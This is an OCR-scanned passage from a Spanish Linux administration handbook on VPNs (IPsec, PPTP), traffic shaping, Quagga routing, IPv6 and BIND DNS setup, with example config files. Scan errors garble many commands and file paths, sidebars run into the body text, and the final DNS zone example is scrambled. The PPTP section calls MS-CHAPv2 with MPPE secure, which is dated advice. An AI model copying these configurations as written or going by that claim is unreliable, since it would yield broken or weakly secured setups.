talar  un  demonio  IKE  ( intercambio  de  Haves  IPsec:  «IPsec  Key  Exchange»)  como  racoon,  strongswan 
hace  el  proceso  mucho  mas  simple  centralizando  la  administracion  y  mas  seguro  rotando  las 
claves  periodicamente. 

A  pesar  de  su  estado  como  referencia,  la  complejidad  de  configuracion  de  IPsec  restringe  su  uso 
en  la  practica.  Generalmente  se  preferiran  soluciones  basadas  en  OpenVPN  cuando  los  tuneles 
necesarios  no  sean  muchos  ni  demasiado  dinamicos. 


PRECAUCION  Los  firewall  con  NAT  y  IPsec  no  funcionan  bien  juntos:  IPsec  firma  los  paquetes 

IPsec  y  NAT  Y  cualquier  cambio  en  estos  paquetes  que  realice  el  firewall  invalidara  la  firma 

y  el  destino  rechazara  los  paquetes.  Muchas  implementaciones  IPsec  incluyen  la 
tecnica  NAT-T  ( NAT  Traversal),  que  basicamente  encapsula  un  paquete  IP  en  un 
paquete  UDP  estandar. 


SEGURIDAD  El  modo  de  operacion  estandar  de  IPsec  involucra  intercambio  de  datos  en  el  puer- 

IPsec  y  firewalls  to  UDP  500  para  intercambio  de  Haves  (tambien  en  el  puerto  UDP  4500  si  utiliza 

NAT-T).  Lo  que  es  mas,  los  paquetes  IPsec  utilizan  dos  protocolos  IP  dedicados  que 
el  firewall  debe  dejar  pasar;  la  recepcion  de  estos  paquetes  esta  basada  en  sus  nu- 
meros  de  protocolo:  50  (ESP)  y  51  (AH). 


10.2.4.  PPTP 

PPTP  ( protocolo  de  tuneles  punto  a  punto:  «Point-to-Point  Tunneling  Protocol)))  utiliza  dos  canales 
de  comunicacion,  uno  para  datos  de  control  y  otro  para  los  datos;  este  ultimo  utiliza  el  protocolo 
GRE  (encapsulation  generica  de  enrutamiento :  «Generic  Routing  Encapsulation))).  Luego  se  estable- 
ce  un  enlace  PPP  estandar  sobre  el  canal  de  intercambio  de  datos. 


Configuracion  del  cliente 

El  paquete  pptp-linux  contiene  un  cliente  PPTP  para  Linux  facil  de  configurar.  Las  instrucciones 
a  continuacion  estan  inspiradas  en  la  documentacion  oficial: 

+  http ://pptpclient . sourceforge . net/howto-debian . phtml 

Los  administradores  de  Falcot  crearon  varios  archivos:  /etc/ppp/options .  pptp,  /etc/ppp/ 
peers/falcot,  /etc/ppp/ip- up . d/ falcot  y /etc/ppp/ip -  down .d/ falcot. 
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Ejemplo  10.2  El  archivo  /etc/ ppp/options .  pptp 


#  opciones  PPP  utilizadas  en  una  conexion  PPTP 

lock 

noauth 

nobsdcomp 

nodeflate 


Ejemplo  10.3  El  archivo  / etc/ ppp/ peers/  falcot 


#  vpn.falcot.com  es  el  servidor  PPTP 
pty  "pptp  vpn.falcot.com  - -nolaunchpppd" 

#  el  usuario  «vpn»  identificara  a  la  conexion 
user  vpn 

remotename  pptp 

#  necesita  cifrado 
require-mppe-128 

file  /etc/ppp/options . pptp 
ipparam  falcot 


Ejemplo  10.4  El  archivo  /etc/ ppp/ ip-up .  d/ falcot 


#  Crear  la  ruta  a  la  red  Falcot 
if  [  "$6"  =  "falcot"  ] ;  then 

#  192.168.0.0/24  es  la  red  Falcot  (remota) 

route  add  -net  192.168.0.0  netmask  255.255.255.0  dev  $1 


Ejemplo  10.5  El  archivo  /etc/ ppp/ ip-down .  d/  falcot 


#  Eliminar  la  ruta  a  la  red  Falcot 
if  [  "$6"  =  "falcot"  ] ;  then 

#  192.168.0.0/24  es  la  red  Falcot  (remota) 

route  del  -net  192.168.0.0  netmask  255.255.255.0  dev  $1 


SEGURIDAD  Asegurar  PPTP  involucra  utilizar  la  funcionalidad  MPPE  ( cifrado  punto  a  punto  de 

MPPE  Microsoft:  «Microsoft  Point-to-Point  Encryption»),  disponible  como  un  modulo  en 
los  nucleos  Debian  oficiales. 
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Configuracion  del  servidor 


PRECAUCION  Necesita  configurar  los  firewalls  intermedios  para  que  permitan  pasar  paquetes  IP 

PPTP  y  firewalls  tlue  utilizan  el  protocolo  47  (GRE).  Lo  que  es  mas,  necesita  abrir  el  puerto  1723  del 

servidor  PPTP  para  que  pueda  utilizar  el  canal  de  comunicacion. 


pptpd  es  el  servidor  PPTP  para  Linux.  Necesitara  cambiar  pocas  cosas  de  su  archivo  de  configu¬ 
racion  principal,  /etc/pptpd  .  conf:  localip  (direccion  IP  local)  y  remoteip  (direccion  IP  remota). 
En  el  ejemplo  a  continuacion  el  servidor  PPTP  siempre  utiliza  la  direccion  192.168.0.199  y  los 
clientes  PPTP  reciben  una  direccion  IP  desde  192.168.0.200  a  192.168.0.250. 


Ejemplo  10.6  El  archivo /etc/ pptpd .  conf 


#  ETIQUETA:  speed 

# 

#  Especifica  la  velocidad  a  la  que  se  comunica  el  demonio  PPP. 

# 

speed  115200 

#  ETIQUETA:  option 

# 

#  Especifica  la  ubicacion  del  archivo  de  opciones  PPP 

#  De  forma  predeterminada,  se  lo  busca  en  «/etc/ppp/options» 

# 

option  /etc/ppp/pptpd -options 

#  ETIQUETA:  debug 

# 

#  Activa  (mas)  depuracion  al  registro  del  sistema 

# 

#  debug 

#  ETIQUETA:  localip 

#  ETIQUETA:  remoteip 

# 

#  Especifica  los  rangos  de  direcciones  IP  local  y  remoto 

# 

#  Puede  especificar  direcciones  IP  individuales  separadas  por  coma  o 

#  rangos  o  ambos.  Por  ejemplo: 

# 

#  192.168.0.234,192.168.0.245-249,192.168.0.254 

# 

#  RESTRICCIONES  IMPORTANTES : 

# 

#  1.  No  se  permiten  espacios  entre  las  comas  o  en  las  direcciones. 

# 

#  2 .  Si  provee  mas  direcciones  IP  que  MAXC0NNECTI0NS,  comenzara  al 
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# 

# 

# 

# 

# 

# 

# 

# 

# 

# 


principio  de  la  lista  y  continuara  hasta  que  obtenga 

MAX  CONNECTIONS  direcciones  IPs.  De  lo  contrario  sera  ignorado. 

3.  iSin  atajos  en  los  rangos!  Es  decir  que  234-8  no  significa  234 
a  238,  para  esto  debe  tipear  234-238. 

4.  Esta  bien  si  provee  solo  una  IP  local  -  se  configuraran  todas 
las  IPs  locales  como  la  provista.  DEBE  proveer  al  menos  una  IP 
remota  para  cada  cliente  simultaneo. 


#localip  192 .168.0. 234-238 , 192 .168.0. 245 
#remoteip  192 .168.1. 234-238 , 192 .168.1. 245 
#localip  10.0.1.1 
#remoteip  10.0.1.2-100 
localip  192.168.0.199 
remoteip  192.168.0.200-250 


La  configuracion  PPP  utilizada  por  el  servidor  PPTP  tambien  necesita  algunos  cambios  en  el 
archivo  /etc/ppp/pptpd  -  options.  Los  parametros  importantes  son  el  nombre  del  servidor 
(pptp),  el  nombre  del  dominio  (falcot.com  y  la  direccion  IP  para  los  servidores  DNS  y  WINS. 


Ejemplo  10.7  El  archivo  /etc/ ppp/pptpd-options 


##  activar  la  depuracion  de  pppd  en  el  registro  del  sistema 
#debug 

##  modifique  «servername»  a  lo  que  sea  que  especifico  como  su  nombre  de  servidor  en 
chap-secrets 
name  pptp 

##  modifique  el  nombre  del  dominio  a  su  dominio  local 
domain  falcot.com 

##  Estos  son  valores  predeterminados  razonables  para  clientes  WinXXXX 
##  para  las  configuraciones  relacionadas  con  seguridad 

#  El  paquete  pppd  de  Debian  ahora  es  compatible  tanto  con  MSCHAP  como  con  MPPE, 

activelos  aqui. 

#  iNecesita  tener  tambien  el  modulo  de  nucleo  para  MPPE! 
auth 

require-chap 

require-mschap 

require-mschap-v2 

require-mppe-128 

##  Complete  con  sus  direcciones 
ms-dns  192.168.0.1 
ms -wins  192.168.0.1 
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##  Complete  con  su  mascara  de  red 
netmask  255.255.255.0 

##  Algunos  valores  predeterminados 

nodefaultroute 

proxyarp 

lock 


El  ultimo  paso  consiste  en  registrar  el  usuario  vpn  (y  su  contrasena  asociada)  en  el  archivo 
/etc/ppp/chap-  secrets.  A  diferencia  de  otras  instancias  en  las  que  un  asterisco  («*»)  funcio- 
naria,  aqui  debe  proveer  exph'citamente  el  nombre  del  servidor.  Lo  que  es  mas,  los  clientes  PPTP 
Windows  se  identifican  a  si  mismo  en  la  forma  DOMINIOWUSUARIO  en  lugar  de  solo  proveer 
un  nombre  de  usuario.  Esto  explica  porque  el  archivo  tambien  menciona  el  usuario  FALCOTW 
vpn.  Tambien  es  posible  especificar  una  direccion  IP  individual  para  los  usuarios;  un  asterisco 
en  este  campo  especifica  que  debe  utilizar  direcciones  dinamicas. 


Ejemplo  10.8  El  archivo  /etc/ppp/chap- secrets 


#  Secretos  para  autenticacion  utilizando  CHAP 

#  cliente  servidor  secreto  direccion 

vpn  pptp  f@Lc3au  * 

FALCOTWvpn  pptp  f@Lc3au  * 


IP 


SEGURIDAD  La  primera  implementacion  PPTP  de  Microsoft  tuvo  muchas  crfticas  debido  a  su 
Vulnerabilidades  PPTP  cantidad  de  vulnerabilidades  de  seguridad;  la  mayorfa  han  sido  solucionadas  desde 

entonces  en  versiones  mas  recientes.  La  configuracion  documentada  en  esta  sec- 
cion  utiliza  la  ultima  version  del  protocolo.  Sin  embargo,  debe  saber  que  eliminar 
algunas  opciones  (como  require-mppe- 128  y  require-mschap-v2)  podria  hacer 
al  servicio  nuevamente  vulnerable. 


10.3.  Calidad  del  servicio 

10.3.1.  Principioy  mecanismo 

Calidad  del  servicio  (QoS:  «Quality  of  Service»)  se  refiere  a  un  conjunto  de  tecnicas  que  garantizan 
o  mejoran  la  calidad  del  servicio  provisto  a  las  aplicaciones.  De  estas,  la  tecnica  mas  popular 
consiste  en  clasificar  el  trafico  de  red  en  categories  y  diferenciar  la  gestion  del  trafico  segun  la 
categoria  a  la  que  pertenezca.  El  uso  principal  de  este  concepto  de  servicios  diferenciados  es 
la  manipulacion  de  trafico  («traffic  shaping»),  que  limita  las  tasas  de  transmision  de  datos  para 
conexiones  relacionadas  con  algunos  servicios  y/o  equipos  para  no  saturar  el  ancho  de  banda 
disponible  y  privar  a  otros  servicios  importantes.  Esta  tecnica  es  particularmente  buena  para 
trafico  TCP  ya  que  el  protocolo  se  adapta  automaticamente  al  ancho  de  banda  disponible. 
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Tambien  es  posible  alterar  las  prioridades  del  trafico,  lo  que  permite  priorizar  paquetes  relacio- 
nados  con  servicios  interactivos  (como  ssh  y  telnet)  o  a  servicios  que  solo  trabajan  con  bloques 
de  datos  pequenos. 

Los  nucleos  Debian  incluyen  la  funcionalidad  necesaria  para  QoS  as!  como  tambien  los  modu- 
los  asociados.  Estos  modulos  son  muchos  y  cada  uno  de  ellos  provee  un  servicio  diferente,  los 
mas  notables  como  planificadores  especiales  para  las  colas  de  paquetes  IP;  el  amplio  rango  de 
comportamientos  de  planificadores  abarca  todo  el  rango  de  requerimientos  posibles. 


CULTURA 

El  «howto»  de  Linux  Advanced  Routing  &  Traffic  Control  es  el  documento  de 

LARTC  —  Enrutamiento 

referenda  que  cubre  todo  lo  que  hace  falta  saber  sobre  calidad  de  servicio  en  una 

avanzado  y  control  de  trafico 

red. 

de  Linux  (« Linux 

http://www.lartc.org/howto/ 

Advanced  Routing  & 

Traffic  Control») 

10.3.2.  Configuration  e  implementation 

Se  configuran  los  parametros  de  QoS  mediante  el  programa  tc  (provisto  por  el  paquete  iproute). 
Se  recomienda  utilizar  herramientas  de  mas  alto  nivel  ya  que  su  interfaz  es  bastante  compleja. 


Reduction  de  latencias:  wondershaper 

El  proposito  principal  de  wondershaper  (en  el  paquete  con  nombre  similar)  es  minimizar  las 
latencias  independientemente  de  la  carga  en  la  red.  Consigue  esto  limitando  el  trafico  total  a  un 
valor  que  esta  justo  por  debajo  del  valor  de  saturacion  del  enlace. 

Una  vez  que  una  interfaz  de  red  esta  configurada  puede  definir  sus  limitaciones  de  trafico  eje- 
cutando  wondershaper  interfaz  tasajdescarga  tasa_subida.  La  interfaz  puede  ser,  por 
ejemplo,  ethO  o  pppO y  ambas  tasas  son  en  kilobits  por  segundo.  Ejecutar  wondershaper  remove 
interfaz  desactiva  el  control  de  trafico  en  la  interfaz  especificada. 

Para  una  conexion  Ethernet,  lo  mejor  es  ejecutar  este  script  inmediatamente  despues  de  con- 
figurar  la  interfaz.  Puede  lograrlo  agregando  directivas  up  y  down  al  archivo  /etc/network/ 
inte rf  aces  indicando  las  ordenes  a  ejecutar  luego  que  se  configure  la  interfaz  y  luego  que  sea 
desconfigurada,  respectivamente.  Por  ejemplo: 


Ejemplo  10.9  Cambios  en  el  archivo  /etc/ network/ interfaces 


iface  ethO  inet  dhcp 

up  /sbin/wondershaper  ethO  500  100 
down  /sbin/wondershaper  remove  ethO 


En  el  caso  de  PPP,  crear  un  script  que  ejecute  wondershaper  en  /etc/ppp/ip-  up . d/  activara  el 
control  de  trafico  tan  pronto  como  este  activa  la  conexion. 
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YENDO  MAS  ALLA 

Configuration  optima 


El  archivo  /us r/share/doc/wondershaper/README . Debian .  gz  describe,  con  su- 
ficiente  detalles,  los  metodos  de  configuracion  recomendados  por  el  encargado  del 
paquete.  En  particular,  aconseja  medir  las  velocidades  de  subida  y  bajada  para  eva- 
luar  de  la  mejor  forma  los  limites  reales. 


Configuracion  estandar 

A  menos  que  exista  una  configuracion  de  QoS  especifica,  el  nucleo  Linux  utiliza  el  planificador 
de  colas  pfifo_fast  el  cual  provee  algunas  caracteristicas  interesantes  en  si  mismo.  La  prioridad 
de  cada  paquete  IP  procesado  esta  basada  en  el  campo  ToS  (tipo  de  servicio:  «Type  of  Service») 
del  mismo;  modificar  este  campo  es  suficiente  para  tomar  ventaja  de  sus  capacidades  de  plani- 
ficacion.  Existen  cinco  valores  posibles: 

■  Servicio  normal:  Normal-Service  (o); 

■  Minimizar  costo:  Minimize-Cost  (2); 

■  Maximizar  confiabilidad:  Maximize-Reliability  (4); 

■  Maximizar  rendimiento:  Maximize-Throughput  (8); 

■  Minimizar  demora:  Minimize-Delay  (16). 

Las  aplicaciones  que  generan  paquetes  IP  pueden  definir  el  campo  ToS,  tambien  puede  ser  mo- 
dificado  al  vuelo  por  netfilter.  Las  siguientes  reglas  son  suficiente  para  aumentar  la  respuesta  del 
servicio  de  un  servidor  SSH: 

iptables  -t  mangle  -A  PREROUTING  -p  tcp  --sport  ssh  -j  TOS  --set-tos  Minimize-Delay 
iptables  -t  mangle  -A  PREROUTING  -p  tcp  --dport  ssh  -j  TOS  --set-tos  Minimize-Delay 


10.4.  Enrutamiento  dinamico 

Actualmente,  la  herramienta  de  referenda  para  enrutamiento  dinamico  es  quagga,  del  paquete 
con  un  nombre  similar;  solia  ser  zebra  hasta  que  se  detuvo  el  desarrollo  de  este  ultimo.  Sin 
embargo,  quagga  mantuvo  los  nombres  de  los  programas  por  cuestiones  de  compatibilidad,  lo 
que  explica  el  uso  de  zeb  ra  a  continuacion. 


VOLVER  A  LOS  CIMIENTOS  El  enrutamiento  dinamico  le  permite  a  los  routers  ajustar,  en  tiempo  real,  los  ca- 

Enrutamiento  dinamico  rninos  utilizados  para  transmitir  paquetes  IP.  Cada  protocolo  posee  sus  propios 

metodos  para  definir  rutas  (camino  mas  corto,  utilizar  rutas  publicadas  por  pares, 
etc.). 

En  el  nucleo  Linux  una  ruta  enlaza  un  dispositivo  de  red  a  un  conjunto  de  maquinas 
que  pueden  ser  alcanzadas  a  traves  de  este  dispositivo.  El  programa  route  define 
nuevas  rutas  y  muestra  las  existentes. 


Quagga  es  un  conjunto  de  demonios  que  cooperan  entre  si  para  definir  las  tablas  de  enrutamien¬ 
to  utilizadas  por  el  nucleo  Linux;  cada  protocolo  de  enrutamiento  (BGP,  OSPF  y  RIP  siendo  los 
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mas  notables)  provee  su  propio  demonio.  El  demonio  zeb  ra  recolecta  la  informacion  de  los  otros 
demonios  y  administra  las  tablas  de  enrutamiento  estatico  de  forma  acorde.  Los  otros  demonios 
son  bgpd,  ospfd,  ospf6d,  ripd,  ripngd,  isisd  y  babeld. 

Puede  activar  demonios  mediante  la  edicion  el  archivo  /etc/quagga/daemons  y  creando  el  ar- 
chivo  de  configuracion  apropiado  en  /etc/quagga/;  debe  nombrar  este  archivo  de  configura¬ 
cion  segun  el  demonio,  con  una  extension  .  conf  y  debe  pertenecer  al  usuario  quaggay  al  grupo 
quaggavty  para  que  el  script  /etc/init .  d/quagga  ejecute  el  demonio. 

Para  configurar  cada  uno  de  estos  demonio  necesita  conocer  el  protocolo  de  enrutamiento  en 
cuestion.  No  podemos  describir  en  detalle  aqui  a  estos  protocolos,  pero  el  paquete  quagga-doc 
provee  una  explicacion  extensa  en  forma  de  archivos  info.  Puede  navegar  los  mismos  conteni- 
dos  en  formato  HTML  en  el  sitio  web  de  Quagga: 

http : //www. nongnu . org/quagga/docs/docs- info . html 

Ademas,  la  sintaxis  es  muy  parecida  a  la  configuracion  de  una  interfaz  estandar  de  un  router,  y 
los  administradores  de  red  la  adaptaran  rapidamente  a  quagga. 


EN  LA  PRACTICA  OSPF  es  generalmente  el  mejor  protocolo  a  utilizar  para  enrutamiento  dinamico 
^OSPF  BGP  o  RIP?  en  redes  pnvadas  pero  BGP  es  mas  comun  para  enrutamiento  en  Internet.  RIP  es 
bastante  arcaico  y  rara  vez  utilizado  en  la  actualidad. 


10.5  IPv6 


IPv6,  sucesor  de  IPv4,  es  una  nueva  version  del  protocolo  IP  disenado  para  corregir  sus  fallas, 
especialmente  la  escasez  de  direcciones  IP  disponibles.  Este  protocolo  gestiona  la  capa  de  red; 
su  proposito  es  proveer  una  forma  de  direccionar  maquinas  para  transmitir  los  datos  a  donde 
fueron  destinados  y  administrar  la  fragmentacion  de  datos  si  es  necesaria  (en  otras  palabras, 
dividir  los  paquetes  en  trozos  de  un  tarnaho  que  dependa  de  los  enlaces  de  red  utilizados  en  el 
camino  y  unirlos  nuevamente  en  el  orden  apropiado  cuando  lleguen). 

Los  nticleos  Debian  incluyen  la  gestion  de  IPv6  en  el  corazon  del  nucleo  (con  la  excepcion  de 
algunas  arquitecturas  que  la  poseen  como  un  modulo  llamado  ipv6).  Las  herramientas  basicas 
como  ping  y  trace  route  tienen  sus  equivalentes  IPv6,  ping6  y  traceroute6,  disponibles  en 
los  paquetes  iputils-ping  y  iputils-tracepath  respectivamente. 

Una  red  IPv6  se  configura  de  forma  similar  a  una  IPv4,  en  el  archivo  /et  c/netwo  rk/inte  rf  aces. 
Pero  si  desea  que  se  pueda  acceder  globalmente  a  la  red  debe  asegurarse  de  tener  un  router 
compatible  con  IPv6  que  retransmita  datos  a  la  red  IPv6  global. 
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Ejemplo  10.10  Ejemplo  de  configuracion  IPv6 


iface  eth0  inet6  static 

address  2001 : db8 : 1234 : 5 : : 1 : 1 
netmask  64 

#  Desactivar  autoconfiguracion 

#  autoconf  0 

#  El  enrutador  se  configura  automaticamente  y  no  tiene  direccion 

#  fija  (acceptra  1).  Si  la  tuviera: 

#  gateway  2001 : db8 : 1234 : 5 : : 1 


Las  subredes  IPv6  generalmente  tienen  una  mascara  de  red  de  64  bits.  Esto  significa  que  existen 
2 64  direcciones  diferentes  dentro  de  la  subred.  Esto  permite  que  «  Stateless  Address  Autoconfigu- 
ration»  (SLAAC:  autoconfiguracion  de  direcciones  sin  estado)  selecione  una  direccion  basada  en 
la  direccion  MAC  de  la  interfaz  de  red.  De  forma  predeterminada,  si  SLAAC  esta  activado  en  su 
red  e  IPv6  en  su  equipo,  el  nucleo  encontrara  enrutadores  IPv6  automaticamente  y  configurara 
las  interfaces  de  red. 

Este  comportamiento  podria  tener  consecuencias  en  la  privacidad.  Si  cambia  de  red  frecuen- 
temente,  por  ejemplo  con  un  portatil,  podria  no  desear  que  su  direccion  MAC  sea  parte  de 
su  direccion  IPv6  publica.  Esto  facilita  la  identificacion  del  mismo  dispositivo  en  varias  redes. 
Las  extensiones  de  privacidad  de  IPv6  (las  cuales  en  Debian  se  habilitan  por  defecto  si  se  de¬ 
tecta  conectividad  IPv6  durante  la  instalacion  inicial)  son  una  solucion  a  este  problema,  las 
que  asignaran  direcciones  adicionales  generadas  aleatoriamente  a  la  interfaz,  las  cambiaran 
periodicamente  y  las  preferiran  para  conexiones  salientes.  Las  conexiones  entrantes  todavia 
podran  utilizar  las  direcciones  generadas  por  SLAAC.  El  ejemplo  a  continuacion,  para  utilizar  en 
/etc/network/interfaces,  activa  estas  extensiones  de  privacidad. 


Ejemplo  10.1 1  Extensiones  de  privacidad  IPv6 


iface  eth0  inet6  auto 

#  Preferir  las  direcciones  asignadas  aleatoriamente  para  conexiones  salientes. 
privext  2 


SUGERENCIA  Mucho  software  necesita  ser  adaptado  para  que  pueda  utilizar  IPv6.  La  mayorta  de 
Programas  desarrollados  l°s  Paquetes  en  Debian  ya  fueron  adaptados,  pero  no  todos.  Si  su  paquete  favorito 

con  IPv6  no  func'ona  con  IPv6  todavta,  puede  pedir  ayuda  en  la  lista  de  correo  debian-ipv6. 

All!  podrian  recomendarle  un  reemplazo  que  funcione  con  IPv6  y  reportaran  el  error 
para  que  se  lo  siga  apropiadamente. 

»•  http://lists. debian . org/debian- ipv6/ 


Puede  restringir  las  conexiones  IPv6  de  la  misma  forma  que  aquellas  IPv4:  el  nucleo  Debian 
estandar  incluye  una  adaptacion  de  netfilter  para  IPv6.  Puede  configurar  esta  version  de  netfilter 
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para  IPv6  de  forma  similar  a  su  contraparte  IPv4  utilizando  el  programa  ip6tabl.es  en  lugar  de 
iptables. 


10.5.1.  Tuneles 


PRECAUCION  Los  tuneles  IPv6  sobre  IPv4  (a  diferencia  de  IPv6  nativo)  necesitan  que  el  firewall 

Firewalls  y  tuneles  IPv6  acepte  el  trafico,  que  utiliza  el  numero  de  protocolo  IPv4  41. 


Si  no  existe  una  conexion  IPv6  disponible,  el  metodo  de  respaldo  es  utilizar  un  tunel  sobre  IPv4. 
Gogo  es  un  proveedor  (gratuito)  de  dichos  tuneles: 

http : //www. gogo6 . net/ freenet 6/tunnel broker 

Para  utilizar  un  tunel  de  Freenet6  necesita  registrarse  con  una  cuenta  «Freenet6  Pro»  en  el 
sitio  web,  instalar  el  paquete  gogoc  y  configurar  el  tunel.  Para  ello  debera  editar  el  archivo 
/etc/gogoc/gogoc .  conf :  debe  agregar  las  lineas  userid  y  password  que  recibio  por  email  y  re- 
emplazar  server  con  authenticated.freenet6.net. 

Puede  agregar  las  siguientes  tres  directivas  al  archivo  /etc/gogoc/gogoc .  conf  para  proponer 
conectividad  IPv6  a  todas  las  maquinas  en  una  red  local  (asumiendo  que  la  red  local  esta  conec- 
tada  a  la  interfaz  etho): 

host  type= router 
pref ixlen=56 
if  pref ix=eth0 

Luego  la  maquina  se  convertira  en  el  router  de  acceso  para  una  subred  con  un  prefijo  de  56 
bits.  Una  vez  que  el  tunel  sepa  de  este  cambio,  debe  informarle  a  la  red  al  respecto;  esto  implica 
instalar  el  demonio  radvd  (del  paquete  del  mismo  nombre).  Este  demonio  de  configuration  IPv6 
tiene  un  rol  similar  al  de  dhcpd  en  el  mundo  IPv4. 

Debe  crear  el  archivo  de  configuration  /etc/ radvd  .  conf  (revise  el  archivo  /us r/sha  re/doc/ 
radvd/examples/simple-  radvd .  conf  como  punto  de  partida).  En  nuestro  caso,  el  unico  cam¬ 
bio  necesario  es  el  prefijo  que  debe  reemplazar  con  el  provisto  por  Freenet6;  puede  encontrarlo 
en  la  salida  de  if  conf  ig,  en  el  bloque  sobre  la  interfaz  tun. 

Luego  ejecute  service  gogoc  restart  y  service  radvd  start, y  la  red  IPv6  deberia  funcio- 
nar. 


10.6.  Servidores  de  nombres  de  dominio  (DNS) 

10.6.1.  Principioy  mecanismo 

El  servicio  de  nombres  de  dominio  (DNS:  «Domain  Name  Service»)  es  un  componente  fundamental 
de  Internet:  asocia  nombres  de  equipo  con  direcciones  IP  (y  viceversa),  lo  que  permite  utilizar 
www.debian.org  en  lugar  de  5.153.231.4  o  2001:41c8:1000:21::21:4. 
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Los  registros  DNS  se  organizan  en  zonas;  cada  zona  coincide  con  un  dominio  (o  subdominio) 
o  un  rango  de  direcciones  IP  (ya  que  generalmente  se  proveen  direcciones  IP  en  rangos  con- 
secutivos).  Un  servidor  primario  es  autoridad  sobre  los  contenidos  de  una  zona;  los  servidores 
secundarios,  generalmente  en  otras  maquinas,  proveen  copias  de  la  zona  primaria  actualizadas 
regularmente. 

Cada  zona  puede  contener  registros  de  varios  tipos  ( registros  de  recursos:  «Resource  Records»): 

■  A:  direccion  IPv4. 

■  CNAME:  alias  ( nombre  canonico :  «canonical  name»). 

■  MX:  intercambio  de  correo  («mail  exchange))),  un  servidor  de  correo.  Los  otros  servidores 
de  correo  utilizan  esta  informacion  para  encontrar  a  donde  redirigir  los  emails  enviados 
a  una  direccion  particular.  Cada  registro  MX  tiene  una  prioridad.  Primero  se  intenta  el 
servidor  con  mayor  prioridad,  con  el  menor  numero  (revise  el  recuadro  «SMTP»  pagina 
268);  se  contactan  los  demas  servidores  en  orden  decreciente  de  prioridad  si  el  primero 
no  responde. 

■  PTR:  asociacion  de  una  direccion  IP  con  un  nombre.  Se  almacenan  estos  registros  en  una 
zona  de  «DNS  inverso»  cuyo  nombre  esta  basado  en  el  rango  de  direcciones  IP.  Por  ejem- 
plo,  1.168. 192. in-addr.arpa  es  la  zona  que  contiene  las  asociaciones  inversas  de  todas  las 
direcciones  en  el  rango  192.168.1.0/24. 

■  AAAA:  direccion  IPv6. 

■  NS:  asocia  un  nombre  con  un  servidor  de  nombres.  Cada  dominio  debe  tener  al  menos  un 
registro  NS.  Estos  registros  apuntan  al  servidor  DNS  que  puede  responder  consultas  sobre 
este  dominio;  generalmente  apuntan  a  los  servidores  primarios  y  secundarios  del  dominio. 
Estos  registros  tambien  permiten  delegaciones  de  DNS;  por  ejemplo,  la  zona  falcot.com 
puede  incluir  un  registro  NS  para  internal.falcot.com,  lo  que  significa  que  otro  servidor 
administra  la  zona  internal.falcot.com.  Por  supuesto,  este  servidor  debe  declarar  una  zona 
internal.falcot.com. 

El  servidor  de  nombres  de  referencia,  Bind,  fue  desarrollado  y  es  mantenido  por  ISC  ( consorte  de 
software  de  Internet  «Internet  Software  Consortium))).  Esta  disponible  en  Debian  en  el  paquete 
bind9.  La  version  9  provee  dos  cambios  importantes  comparada  con  versiones  anteriores.  Pri¬ 
mero,  el  servidor  DNS  ahora  puede  ejecutar  como  un  usuario  sin  privilegios  para  que  una  vul- 
nerabilidad  de  seguridad  en  el  servidor  no  provea  permisos  de  root  al  atacante  (como  pasaba 
frecuentemente  con  las  versiones  8.X). 

Lo  que  es  mas,  Bind  es  compatible  con  el  estandar  DNSSEC  para  firmar  (y,  por  lo  tanto,  autenti- 
car)  registros  DNS,  lo  que  permite  bloquear  datos  apocrifos  durante  ataques  con  intermediaries 
(«man-in-the-middle»). 
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CULTURA  La  normativa  DNSSEC  es  bastante  compleja;  esto  explica  parcialmente  por  que  no 
DNSSEC  es  utilizada  ampliamente  aun  (aun  si  puede  coexistir  perfectamente  con  servidores 
DNS  que  no  conozcan  de  DNSSEC).  Para  entender  los  recovecos  deberia  revisar  el 
siguiente  articulo. 

•-  http : //en .Wikipedia . org/wiki/Domain_Name_System_Security_ 
Extensions 


10.6.2.  Configuration 

Archivos  de  configuration  de  bind,  sin  importar  su  version,  tienen  la  misma  estructura. 

Los  administradores  de  Falcot  crearon  una  zona  primaria  falcot.com  para  almacenar  informa- 
cion  relacionada  con  este  dominioy  una  zona  168.192.in-addr.arpa  para  la  asociacion  inversa  de 
direcciones  IP  en  las  redes  locales. 


PRECAUCION  Las  zonas  inversas  tiene  un  nombre  particular.  La  zona  que  cubre  la  red  192 . 168 . 0  . 
Nombres  de  zonas  0/16  necesita  llamarse  168 . 192  .  in- add r .  arpa:  se  invierten  los  componentes  de 
inversas  direccion  IP  seguidos  del  sufijo  in- add r .  arpa. 

Para  redes  IPv6,  el  sufijo  es  ip6  .  arpa  y  los  componentes  de  la  direccion  IP,  inverti- 
dos,  son  cada  caracter  de  la  direccion  IP  en  su  representacion  hexadecimal  comple- 
ta.  Por  ejemplo,  la  red  2001 :  0bc8  :  31a0 :  :  /48  podria  utilizar  una  red  llamada  0 .  a  . 
1.3.8.c.b.0.1.0.0.2.ip6 .arpa. 


SUGERENCIA  El  programa  host  (en  el  paquete  bind9-host)  consulta  un  servidor  DNS  y  puede 
Pruebas  del  servidor  DNS  utilizarse  para  probar  la  configuracion  del  servidor.  Por  ejemplo,  host  maquina. 

falcot .  com  localhost  revisa  la  respuesta  del  servidor  local  a  la  consulta  por  maq 
uina .  falcot .  com.  host  direccion .  ip  localhost  prueba  la  resolucion  inversa. 


Los  siguientes  extractos  de  configuracion,  de  los  archivos  de  Falcot,  pueden  servirle  como  punto 
de  partida  para  configurar  un  servidor  DNS: 


Ejemplo  10.12  Extracto  de  /etc/ bind/ named .  conf .  local 


zone  "falcot.com"  { 
type  master; 

file  ”/et c/bind/d b . falcot . com" ; 
allow-query  {  any;  }; 
allow-transfer  { 

195.20.105.149/32  ;  //  ns0.xname.org 
193.23.158.13/32  ;  //  nsl.xname.org 

}; 


zone  "internal.falcot.com"  { 
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type  master; 

file  "/etc/bind/db . internal . f alcot . com" ; 
allow-query  {  192.168.0.0/16;  }; 


zone  "168 . 192 . in-add r . arpa"  { 
type  master; 

file  "/etc/bind/db. 192. 168"; 
allow-query  {  192.168.0.0/16;  }; 


Ejemplo  10.13  Extracto  de  /etc/bind/db.  f alcot .  com 


;  Zona  falcot.com 
;  admin.falcot.com. 
$TTL  604800 

@  IN  SOA 


=>  contacto  de  la  zona:  admin@falcot.com 


falcot . com . 
20040121 
604800 
86400 
2419200 
604800  ) 


admin.falcot.com.  ( 

;  Serial 
;  Refresco 
;  Reintento 
;  Expiracion 
;  TTL  de  cache  negativo 


El  @  hace  referencia  al  nombre  de  la  zona  («falcot . com»  aqui) 
o  a  $ORIGIN  (origen)  si  se  utilizo  esta  directiva 


t 

<§ 

IN 

NS 

ns 

@ 

IN 

NS 

ns0 .  xname . org 

internal 

.  IN 

NS 

192.168.0.2 

@ 

IN 

A 

